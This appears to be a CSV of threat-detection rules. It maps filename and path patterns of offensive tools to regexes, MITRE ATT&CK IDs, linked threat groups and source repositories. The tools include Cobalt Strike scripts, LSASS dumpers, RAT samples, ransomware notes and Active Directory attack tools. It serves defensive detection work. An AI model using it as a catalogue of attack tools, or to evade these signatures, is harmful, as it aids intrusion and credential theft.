"*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*",".{0,1000}\\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","13762"
"*\a\1\s\x64\Release\ProcDump64.pdb*",".{0,1000}\\a\\1\\s\\x64\\Release\\ProcDump64\.pdb.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","13766"
"*\A7m3d Rat V.*.exe*",".{0,1000}\\A7m3d\sRat\sV\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13767"
"*\AAA_READ_AAA.TXT*",".{0,1000}\\AAA_READ_AAA\.TXT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13771"
"*\AbandonedCOMKeys.*",".{0,1000}\\AbandonedCOMKeys\..{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13773"
"*\ABPTTS-master*",".{0,1000}\\ABPTTS\-master.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","13774"
"*\accounts_passdontexpire.txt*",".{0,1000}\\accounts_passdontexpire\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","13775"
"*\Ace RAT v*\Server.exe*",".{0,1000}\\Ace\sRAT\sv.{0,1000}\\Server\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13776"
"*\ACE_Get-KerberosTicketCache.ps1*",".{0,1000}\\ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13777"
"*\AceRAT-Client.exe*",".{0,1000}\\AceRAT\-Client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13778"
"*\ACEshark.log*",".{0,1000}\\ACEshark\.log.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","#logfile","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","13779"
"*\ACEshark.py*",".{0,1000}\\ACEshark\.py.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","13780"
"*\AD_Miner-*",".{0,1000}\\AD_Miner\-.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","13789"
"*\ADAPE.ps1*",".{0,1000}\\ADAPE\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","13791"
"*\AdapticClient.exe*",".{0,1000}\\AdapticClient\.exe.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","13792"
"*\adaptiveC2.py*",".{0,1000}\\adaptiveC2\.py.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13793"
"*\ADAudit.ps1*",".{0,1000}\\ADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","13794"
"*\ADcheck.py*",".{0,1000}\\ADcheck\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","13796"
"*\ADcheck\Scripts\activate*",".{0,1000}\\ADcheck\\Scripts\\activate.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","13797"
"*\ADcheck-main*",".{0,1000}\\ADcheck\-main.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","13798"
"*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","13799"
"*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","13800"
"*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","13801"
"*\ADCollector3.sln*",".{0,1000}\\ADCollector3\.sln.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","13802"
"*\ADCollector3\*",".{0,1000}\\ADCollector3\\.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","13803"
"*\ADCS.ps1*",".{0,1000}\\ADCS\.ps1.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","13804"
"*\adcs.py*",".{0,1000}\\adcs\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13805"
"*\ADCSCoercePotato\*",".{0,1000}\\ADCSCoercePotato\\.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","13806"
"*\ADCSPwn*",".{0,1000}\\ADCSPwn.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","13807"
"*\ADCSPwn.exe*",".{0,1000}\\ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","13808"
"*\ADCSPwn.exe*",".{0,1000}\\ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","13809"
"*\adcsync.py*",".{0,1000}\\adcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","13810"
"*\add_computer.py*",".{0,1000}\\add_computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13811"
"*\add-admin.exe*",".{0,1000}\\add\-admin\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","13812"
"*\addcomputer.py*",".{0,1000}\\addcomputer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13813"
"*\addcomputer_LDAP_spn.py*",".{0,1000}\\addcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13814"
"*\addcomputer_with_spns.py*",".{0,1000}\\addcomputer_with_spns\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13815"
"*\add-filters-defender-crowdstrike.json*",".{0,1000}\\add\-filters\-defender\-crowdstrike\.json.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","13816"
"*\Add-KeeThiefLurker.ps1*",".{0,1000}\\Add\-KeeThiefLurker\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","13817"
"*\AddNewAdminUser.ahk*",".{0,1000}\\AddNewAdminUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","13818"
"*\Add-RemoteRegBackdoor.ps1*",".{0,1000}\\Add\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","13819"
"*\AddScriptToRegistry.ahk*",".{0,1000}\\AddScriptToRegistry\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","13820"
"*\AddTrustedDomain.py*",".{0,1000}\\AddTrustedDomain\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13821"
"*\AddTrustedDomain.vba*",".{0,1000}\\AddTrustedDomain\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13822"
"*\AddUser.dll*",".{0,1000}\\AddUser\.dll.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","13823"
"*\AddUser.sln*",".{0,1000}\\AddUser\.sln.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","13824"
"*\ADeleg.exe*",".{0,1000}\\ADeleg\.exe.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13825"
"*\ADeleg.exe*",".{0,1000}\\ADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13826"
"*\adeleg.pdb*",".{0,1000}\\adeleg\.pdb.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13827"
"*\adeleg\adeleg\*",".{0,1000}\\adeleg\\adeleg\\.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13828"
"*\adeleg\winldap\*",".{0,1000}\\adeleg\\winldap\\.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13829"
"*\Adeleginator-main*",".{0,1000}\\Adeleginator\-main.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13830"
"*\adeleg-main*",".{0,1000}\\adeleg\-main.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13831"
"*\adfsbrute.py*",".{0,1000}\\adfsbrute\.py.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","13835"
"*\ADFSDump.*",".{0,1000}\\ADFSDump\..{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","13836"
"*\ADFSDump.exe*",".{0,1000}\\ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","13837"
